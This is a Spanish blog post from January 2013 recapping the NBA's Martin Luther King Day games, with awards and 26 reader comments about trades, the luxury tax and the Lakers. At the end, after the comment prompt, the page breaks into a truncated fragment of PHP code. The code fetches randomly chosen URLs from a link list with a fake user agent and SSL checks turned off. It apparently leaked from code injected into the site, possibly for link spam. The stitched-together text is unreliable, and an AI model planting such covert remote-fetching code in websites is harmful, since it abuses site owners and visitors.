La Crónica: Martin Luther King Day

22 de January de 2013 por Simon

El día de Martin Luther King es desde hace muchos años una fecha importante en el calendario NBA. Al ser festivo en los EEUU, la liga aprovecha para poner partidos desde muy temprano. Los jugadores en este día aprovechan para hacer su pequeño homenaje a King, estrenando zapatillas, cintas para brazos y piernas, etc. En lo que compete a la jornada había varios duelos interesantes entre aspirantes a avanzar bastante hacia los Play Off que, aunque todavía se vean muy lejanos, se acercan de forma inexorable.

El primer duelo de la jornada era la visita que hacían los Pacers al FedExForum de Memphis. Se enfrentaban las dos mejores defensas de la liga. El transcurso del partido fue prácticamente lo que se podía prever antes del comienzo: dos equipos punteros jugando un partido igualado a un tanteo bajo debido a las férreas defensas de ambos equipos. Indiana logró una renta durante el último cuarto de 6 puntos que parecía que llevaban a una victoria Pacers pero un arreón grizzlie culminado con un triple de Conley a pase de Randolph ponía uno arriba a Memphis con dos minutos por jugar. Tras un intercambio de golpes, George Hill anotaba un tiro libre a falta de 1’4 segundos para el final que a la postre sería definitivo. Gay anotó el último tiro pero lo hizo fuera de tiempo. Victoria importantísima para los Pacers que cada vez están con más confianza y parecen más enchufados. Hablar de finales de conferencia actualmente para ellos no es nada descabellado (82-81).

Brooklyn y Knicks se enfrentaban por cuarta y última vez esta temporada, al menos en liga regular. Victoria para Nets que igualan a dos el parcial con Knicks esta temporada. los de Brooklyn siguen practicando un gran baloncesto desde que echaron a Johnson y con Carlesimo ya llevan 11 victorias por solo dos derrotas. El partido se mantuvo igualado durante todo el tiempo, con Humphries y JoJo recordándonos a los jugadores que eran cuando lograron sus contratos actuales y que ahora vemos a cuentagotas. Mediado el último cuarto, los Nets abrieron una brecha de 6 puntos pero  tras 5 minutos sin anotar se vieron abajo a falta de 30 segundos. Ahí apareció JoJo con una canasta que les devolvía la delantera. En el siguiente ataque Melo falló y Deron Williams cerró el partido desde la línea de tiros libres (88-85). 

Golden State Warriors se confirma cada vez más como una verdadera alternativa al poder establecido en el Oeste tras vencer anoche en casa a los Clippers. Tras ir todo el partido por delante, en el último cuarto parecía que serían los de Los Angeles los que iban a hacer valer su mayor experiencia pero apareció Stephen Curry y con un triple y algunos tiros libres definió el partido en el último minuto y medio. 28 puntos y 6 asistencias para el base de los Warriors ayer que estuvo bien secundado, como casi siempre, por Jarrett Jack con 18 puntos, 10 asistencias y 6 rebotes. Blake Griffin se marcó un partidazo al borde del triple doble con 26 puntos, 13 rebotes y 8 asistencias pero Paul no tuvo ayer muy centrado el punto de mira y acabó con un 1/7 en tiros de campo (99-106).

Los Bulls lograron una previsible victoria ante Los Angeles Lakers, que si aún tienen alguna remota opción de Play Off es gracias a que este año la octava plaza del Oeste está más barata que nunca. El partido se movió todo el tiempo en el margen de 4-8 puntos de ventaja para Chicago. Al final del tercer cuarto Lakers logró ponerse incluso por delante, pero como suele ocurrir en este tipo de partido entre equipos de zona alta y de la zona baja, Bulls tenía una marcha mas en el último cuarto y éste terminó siendo un paseo para los Bulls. Gasol saltó desde el banquillo para ser, por segunda noche consecutiva, el mejor de los Lakers. Kobe Bryant lanzó 22 veces a canasta para anotar tan solo 7 tiros y es que estuvo muy bien defendido por Jimmy Butler e incluso juraría que por momentos al inicio del último cuarto se intercambiaron los papeles (83-95).

En el resto de la jornada, New Orleans sigue demostrando que va por el buen camino y que con todo el equipo sano desde el inicio podría estar luchando por los Play Off. Anoche vencieron a Sacramento (105-114) con Ryan Anderson como líder, autor de 27 puntos y 7 triples.  Poco importó el partidazo de Cousins. Por su parte, Houston volvió a la senda de la victoria ante los Bobcats gracias al buen acierto de James Harden desde la línea de tiros libres (100-94).

Los Timberwolves continúan en caída libre. Anoche tan solo Kirilenko y Rubio saltaron a la cancha de su teórico quinteto titular a principio de temporada. Atlanta logró con un gran último cuarto llevarse el gato al agua (96-104). Horford y el recién firmado Pargo fueron los mejores Hawks anoche. San Antonio venció a Philadelphia con 24 puntos y 17 rebotes de Tim Duncan (90-85) y, para terminar, Washington venció a Portland y continúa sumando victorias desde la vuelta de Wall, a pesar del mal partido de éste anoche. Crawford anotó un triple sobre la bocina que dio la victoria a los Wizards y de poco sirvió el triple doble que se marcó Batum o los dobles dígitos de todo el quinteto Blazers (98-95).

PREMIOS

MVP: El día que Tim Duncan anuncie su retirada lloraré. No sabemos la suerte que tenemos de podar disfrutar de un jugador histórico que a sus 36 años todavía va dando lecciones a los que jovenzuelos que se le ponen delante. Anoche anotó 24 puntos, capturó 17 rebotes y repartió 5 asistencias.

Rookie: No fue un buen día para los más jóvenes. Anthony Davis se lesionó, Bradley Beal jugó un partido terrible y Damian Lillard anotó 18 puntos pero con malos porcentajes de tiro.

Sorpresa: Anoche fue Kirk Hinrich el mejor jugador que pisó la cancha del United Center de Chicago. Nada menos que 22 puntos, 7 rebotes y 8 asistencias se marcó el hijo pródigo.

Decepción: James Harden acabó con 27 puntos pero anotando solo 5 de sus 20 intentos a canasta. Dwight Howard tampoco jugó su mejor partido, se quedó por debajo de los 10 puntos y los 10 rebotes, algo inusual.

Esfuerzo en vano: Tremendos partidos de Blake Griffin (26-13-8), Demarcus Cousins (29-13) y Kemba Walker (35-3-5), todos con el mismo resultado: derrota.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

26 comentarios a esta entrada

  1. Esteban dice:
    #1

    lo de los lakers ada vez mas deprimente, cuando un equipo toca tanto piso, es contagioso, ya no saldran de alli, el otro dia no pudieron con raptors, quien creia que vencerian a los bulls de visitante? ni el propio kobe por mas optimista que sea,

    solo por que el octavo puesto del oeste es un 22-21 (el del este es un 20-20, q parejos no?), mantienen alguna ilusion, pues no son tantos juegos, pero necesitan un racha larga y postiva yha que al menos los deje en el 50% con 25 partidos por delante, sino lo veo dificil

    como genial esta el ESTE, miami es soberano, pero los knicks apuntalan de atras mientras los nets quieren ser esa alternativa que se planteo al comienzo del año, mientras que si los bulls recuperan a un aceptable derrick rose y los pacers recuperan a un aceptable granger o sacan algo por el antes de la fecha limite de intercambios, tendremos unos PO en el este donde realmente puede pasar cualquier cosa, ni Miami tendria un lugar asegurado en la final

    y a todo ellos hay que sumar a unos celtics… hoy algo atras, pero nunca los des por muertos no? eso si necesitan movrse en el mercado

    hablando de ello, los lakers envian a boston a gasol a cambio de green, lee (o barbosa), sullinger (o bass) y terry? los celtics tendrian q ofrecer alguna pick de loteria

    no les gustaria? a mi entender ambos salen ganando

      Citar

  2. franitis dice:
    #2

    No deberían deshacerse los Celtics de Sullinger y Green a mi entender, menos por Pau. ¿Qué hay de aquello que se hablaba de Demarcus Cousins? Eso sí que sería un “pelotazo” para los verdes…

    Por cierto, partidazo en el Rose Garden ¿No? Qué buena pinta tienen los Wizards con Wall y Nené recuperados, que los Blazers no son moco de pavo…

    Y me alegra mucho la trayectoria de Chicago sin Derrick Rose; yo no daba un duro por ellos sin su MVP, pero desde luego que entre todos me están callando la boca (a mí y a muchos más seguro…) Deng, Boozer y las apariciones estelares de Belinelli el otro día @Celtics y ayer de Hinrich… Están aportando mucho como conjunto.

      Citar

  3. Esteban dice:
    #3

    los celtics no tienen ni las rondas ni los jovenes suficientemente nbuenos para hacerse con sullinger

    gasol podria serles mas utill, como estan las cosas en el este, los celtics necesitan un empojuncito mas para entrar al lote de los igualados y pau podria serlo

      Citar

  4. franitis dice:
    #4

    Esteban:
    los celtics no tienen ni las rondas ni los jovenes suficientemente nbuenos para hacerse con sullinger

    gasol podria serles mas utill, como estan las cosas en el este, los celtics necesitan un empojuncito mas para entrar al lote de los igualados y pau podria serlo

    Entiendo que por Sullinger ahí te refieres a Cousins… Y luego ¿Tú crees que Pau encajaría en un equipo tan luchador y defensivo como los verdes? Aparte de juntarlo a su edad con Pierce (34 años) y KG (36 años). No sé yo… En todo caso en el trade yo metería a Bass y Terry; prefiero suplir a Bass con Green, Sullinger y Gasol, sólo que quedaría un perímetro algo descompensado (Rondo, Barbosa, Lee, Bradley, Green) y habría que valorar algo más. ¿Qué crees?

      Citar

  5. Jose Luis dice:
    #5

    Speights + Ellington + Selby x Leuer (Cavs), hay alguna ronda implicada pero no creo que sean de renombre, movimiento de los Grizzlies paa liberar salario y quedarse con Gay y Randolph al menos hasta final de temporada. Pendiente de firmar a Bill Walker o Sasha Vujacic se dice, veremos.

      Citar

  6. Esteban dice:
    #6

    masl movimiento de menphis, no se puede ahorrar y querer salir campeon al mismo tiempo, solo la magia de buford lo ha lograda hace algunos años y ultimamewnte no le pasa ni cerca

    menphis sentira tanto la salida de speights y ellington, como hubiesen sentido la salida de zach o de rudy, no les sobra nada como para perder dos buenos jugadores de banquillo, bien del estilo, duros y con cara de malos

    si firman a vujacic podria revertirse un poco esto, pero dudo que encaje dado su pesimo nivel defensivo

    los campeonatos de la nba, estan hechos para millonarios, no hay lugar para los pobres

    por otro lado, le veo muy muy buen futuro a selby en los cavs, no sorprenda que se salga en un par de juegos,

    mucho futuro se ve en cleveland

      Citar

  7. Ruxixón dice:
    #7

    ¿Quién compró los derechos televisivos de los Lakers?¿Time Warner o Paramount Comedy?

    El entrenador es un negado pero no lo son menos los dirigentes de los Lakers que han traído a un entrenador de supuesto pedigrí para quitarse el marrón de Phil Jackson de encima.Echarlo,reconocer ahora que se equivocaron se me antoja imposible,así que toca aguantar con D’Antoni y sus cabriolas hasta final de temporada.0 química de equipo,Nash sin poder jugar a ser Nash,Kobe empieza a desquiciarse,Howard echando a perder su carrera a nivel deportivo y Gasol..Pau ahora mismo,si soy GM de otro equipo,doy muy poco por él.El mejor es MWP cuando no saca a pasear sus codos y un tio (Clark) que está de casualidad en el quinteto,aprovechando la oportunidad,cuando no jugó un minuto hasta hace nada.Una autentica casa de locos.Traspasarán a Gasol -ya van retrasados en los plazos- pero yo traspasaba a Howard también,si el futuro de mi equipo después de Kobe va a recaer en Howard apaga y vámonos.Muy duro ver a los Lakers de esta manera.

    Traspaso menor en los Grizzlies,Ellington + Shelby + Speights por Jon Leuer,movimiento para aligerar carga salarial.Una evidencia más de que están intentando mover a Gay o Randolph.

      Citar

  8. Esteban dice:
    #8

    es cierto que menphis tiene a cunningham y a arthur para suplir a speights, pero si Menphis no podia terminar de ser una potencia con ellos 2, dificilmente puedan serlo sin ellos

      Citar

  9. Ruxixón dice:
    #9

    Esteban:
    por otro lado, le veo muy muy buen futuro a selby en los cavs, no sorprenda que se salga en un par de juegos,
    mucho futuro se ve en cleveland

    Pues de momento la imagen que dejó en Memphis es pésima,vale que le dieron poca bola y no genera confianza en el jugador,pero bastante limitado.Quizás en los Cavaliers tenga su oportunidad,quien sabe.

      Citar

  10. Esteban dice:
    #10

    Ruxixón: Pues de momento la imagen que dejó en Memphis es pésima,vale que le dieron poca bola y no genera confianza en el jugador,pero bastante limitado.Quizás en los Cavaliers tenga su oportunidad,quien sabe.

    pero en menphis nunca le dieron 5 minutos seguidos en cancha, y alli lo retaban por noi defender como conley y lo sentaban si lo pasaban

    pero en la d league promedio el año pasado 25 puntos y este 22, y en la liga de verano fue el mas valioso como 28 puntos por partido si no recuerdo mal

    en un estilo libre y con minutos y tranquilidad, creo que sera un suplente de lujo para irving

      Citar

  11. Denise dice:
    #11

    Creo que el error de Selby fue no estar mas tiempo en la NCAA. Se pecipitó entrando tan pronto en la NBA.

    Que pena y que error de Memphis desde mi punto de vista de deshacerse de Speights y Ellington. Joder, que tienen posibilidades de anillo y necesitan un equipo profundo. Si quieren rebajar su espacio salarial, que lo dejen para el verano pero que no toquen al equipo con lo bien que está funcionando.

    La operación en sí entre Memphis-Cavs no es mala para los ositos, pero no ahora a mitad de temporada.

      Citar

  12. nba dice:
    #12

    Lo de Memphis igual son ordenes de Stern, para que los Lakers tengan alguna remota posibilidad de entrar en playoffs, sino es algo dificil de entender todo por unos miseros dolares

      Citar

  13. Jose Luis dice:
    #13

    Son bastantes dólares, cerca de 12 millones si no recuerdo mal.

    ¿Qué Cunningham tienen los Grizzlies? Tienen a Haddadi, eso sí.

      Citar

  14. Esteban dice:
    #14

    Jose Luis:
    Son bastantes dólares, cerca de 12 millones si no recuerdo mal.

    ¿Qué Cunningham tienen los Grizzlies? Tienen a Haddadi, eso sí.

    error mio, cunningham paso a los wolves a principio de temporada, a quien si tienen es a Quincy Pondexter

    el tema no es cuantos doloares sean este año, pues menphis exederse un año por 2 o 3 millones no les es nada, pueden pagarlo

    lo que si sucede es quye hay sanciones e impuestos extras para la reincidencia, es decir que por entrar en el impuesto de lujo, sea el monto que sea, si entras el año que viene denuevo, te castigaran aun mas duro

    lo mismo les pasa a los bulls, que estan 5 millones excedidos, creo que este año es por cada dolar, hay que pagar dos, no seria ese el problema sino la reincidencia en años venideros

      Citar

  15. Esteban dice:
    #15

    exactamente lo mismo les paso a los spurs q tuvieron que prescindir de James Anderson, un joven al que eleigieron en primer ronda, y que cobraba unos 500.000 dolares, para quedarse en $69.369.148

    no es que san anotnio no pueda pagar 300 mil dolares de impuesto de lujo, sino que esa cifra que pone en reincidencia el proximo año

      Citar

  16. Esteban dice:
    #16

    un comentario aparte merecen los pobres grizzlies

    es una pena ver como un plantel tiene chances de todo y se desmorona por no poder pagarlo

    luego de la semifinal de conferencia con el thunder, perdieron a battier, quien podria haber ayudado, firmo por una exepcion de nivel medio en miami, 3 millones

    a comienzo de este año, pierden por no poder pagarle a Mayo, q termino firmando con dallas por 4 millones al año, una cifra mas que modesta, justificada y que lo vuelve una ganga practicamete, bueno, en menphis no podian pagarlo apesar de lo bien que hacia su trabajo viniendo desde la banca

    y ahora pierden a ellington y speights, que entre ambos cobraban 6 millones, a cambio de una exepcion de traspaso,

    es decir q por cibras que para franquicias como NYK, Nets, Lakers, Dallas en su momento, el propio Heat ahora, Houston y sus despilfarros por Lin y Asik, entre otros, PAGAN SIN DESPEINARSE, los Grizzlies terminan desmontando casi todo un equipo

    conservan a su 5 inicial de gran nivel, pero han perdido 4 jugadores por montoncitos de dolares muy utiles, una verdadera pena que invita a refloxionar nuevamente en como juega y para quien el impuesto de lujo

    mas que equilibrar el nuevo convenio desequilibra

      Citar

  17. Sempren dice:
    #17

    Yo creo que Mayo no se fue de Memphis solo por el tema del dinero, también tuvo que pesar mucho que allí cada año iba a peor.
    Con la vuelta de Arthur, la baja de Speights no me parece tan grave (a pesar de que lo hizo muy bien incluso supliendo a Randolph), siendo que se llevan también a Leuer, el problema lo veo en el perímetro: sin ser Ellington un gran jugador, se quedan sin efectivos para jugar por fuera, cuando para mí con un buen sexto hombre para suplir a Tony Allen y los minutos que deja Conley completarían el equipo. Bayless es demasiado irregular para ese rol y la responsabilidad de no haber otro jugador de perímetro bueno ofensivamente hablando, y para mí ni siquiera tiene la calidad suficiente para ello.

      Citar

  18. Esteban dice:
    #18

    mayo se fue por las dos cosas, por un lado menphis no le ofrecio una renovacion, pues se daba por hecho que no podia pagarle y por el otro intentar crecer, auqnue hasta su llegada a los Mavs, los mejores momentos de su carrera los habia vivido cuando Hollins decidio sacarlo de sexto hombre,

    Leur debuto bien en los b ucks algunos primeros juegos pero ha ido desapareciendo del mapa paulatinamente, primero en los bucks y ahora con solo 9 juegos en los cavs, dudo que el pueda ser un arma eficiente en los competitivos Grizzlies

    por otro lado es cierto que cuando llegaron a semifinal de conferencia, los internos de recambio eran arthur y haddadi, quienes aun estan, todo dependera de como responda arthur ahora que debera jugar cerca de 30 minutos por juego

    el perimetro puede salvarse si se consigue algun agente libre, WEST? seria genial sin su enfermedad, con ella es una moneda al aire, habra que esperar algun boyout

      Citar

  19. rumbero dice:
    #19

    El movimiento de Speights suena a recambio definitivo para Varejao. Por mucho que el brasileño esté fuera toda la temporada no tiene demasiado sentido ese fichaje para suplirlo no teniendo opciones de PO y con Zeller/Thompson que necesitan de minutos. Por otro lado se llevan un interior que viene de rendir más que bien y sin un sueldo desorbitado a la espera de lo que pueden sacar por O Rei do Palau

      Citar

  20. Ruxixón dice:
    #20

    Sigo pensando que van a mover a Rudy Gay aún habiendo limitado sus salarios con este traspaso.Es que se acrecienta la falta de banquillo de forma alarmante.Vale que Ellington es un día si y 10 no,y Speights había perdido peso con la recuperación de Arthur,aunque su temporada pasada fue todo un lujo y desde este punto de vista me parece un fichajazo de los Cavs,pero probablemente era de lo mejor en un mal banquillo.Probablemente fichen a Delonte y les aporte bastante pero ya sabemos la cabecita que tiene,pero suenan Childress,Vujacic…nombres de jugadores que no aportan nada para un equipo de PO,de ahí que me mantenga en mis 13 de que buscarán un buen SF y jugadores de rotación para el equipo.

      Citar

  21. R1Molano dice:
    #21

    La reincidencia es aumentar 1 dolar por dolar sobrepasado sobre la tasa en la que estés. Y habría que reincidir 4 de cada 5 años, cosa en la que Memphis no iba a caer.

    ——

    Durante los dos primeros años de convenio, por cada dólar que superen las franquicias por encima del límite de lujo, se pagará otro en concepto de multa tal y como se realizaba hasta ahora, pero en el año 3 del convenio entran los nuevos baremos, con diferentes multas dependiendo del intervalo en el que se sitúe por encima de la barrera del lujo:

    Incrementos
    Ratio

    $0-5M

    $1.50cada$1
    $5M-10M $1.75cada$1
    $10M-15M $2.50cada1$
    $15M-20M $3.25cada1$

    A partir de 20 millones, cada intervalo de 5 más se verá penalizado con $0.50 más, además, las franquicias que paguen lujo 4 de cada 5 años, se les aplicará un incremento de 1$ en cada escalón.

      Citar

  22. Jose Luis dice:
    #22

    Los Lakers de pena. Nash jugando un partido horrible 1-3TC, 5 pérdidas, 3 asistencias, Howard 0-4TC, 2-4TL, 2 rebotes, 2 tapones recibidos. Gasol y Peace bien, en su nivel, y Bryant en modo dios pero ni aún así. 7-8TC, 2-2TL, 2 rebotes, 2 asistencias, 1 robo, 1 pérdida. Los Grizzlies se están hinchando a puntos, y eso que Zach & Marc han estado fuera mucho tiempo por problemas de faltas. Wroten campando a sus anchas, la defensa es la pena. No hay nada que hacer esta temporada, además faltan triplistas o D’Antoni no los pone al menos. Meeks debería jugar más, equipo abierto y pick&roll. Pero es que Howard tampoco lo veo habilidoso para coger un balón a 4-5 metros del aro y en carrera machacar al estilo Stat, aparte debido a su pobre porcentaje en tiros libres siempre van a meterle el hachazo.

    Parecía muy bien configurado el equipo pero poco a poco salen las carencias. Nash ha de jugar con el equipo muy abierto en cancha y ni Pau ni Howard son capaces de hacer eso, y en teoría deberían rondar los 36 minutos cada uno.

      Citar

  23. Jose Luis dice:
    #23

    Qué esperpento… lo que era una última jugada de Lakers, en una contra (con 23 segundos de reloj) se convierte en una carrera de Clark, pase a Kobe a 4 metros del aro, penetración, mandarina de bandeja, mandarina de tiro tras rebote de Clark, rebote Grizzlies y triple Gay.

      Citar

  24. Esteban dice:
    #24

    es el mismo howard el de los lakers? promediando el tercer cuarto, solo 2 puntos, producto de dos libres, y ni un acierto de campo, un total de 2 rebotes y… un -11 los lakers con el en cancha,

    q olor a traspasos q hay en los lakers, si pierden hoy quedaraon 17-25, ese record es muy similar al de potencias como toronto, detroit, hornets…

    mamita, si esto sigue asi, va a ser el peor fracaso de la historia de la nba, ENTRARIAN EN LA LOTERIA

    simplemente increible

      Citar

  25. Jose Luis dice:
    #25

    Howard lesionado, no entra en el 3er cuarto, de nuevo problemas en el hombro…

      Citar

  26. Esteban dice:
    #26

    el trade de temporada baja TAN EXCITANTE!!!

    n tal howard y un tal bynum involucrados, un cmbio historico

    historico por el fracaso que tuvo cada uno en sus destinos, dudo que ninguno de los dos siga en sus equipos al proximo año

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>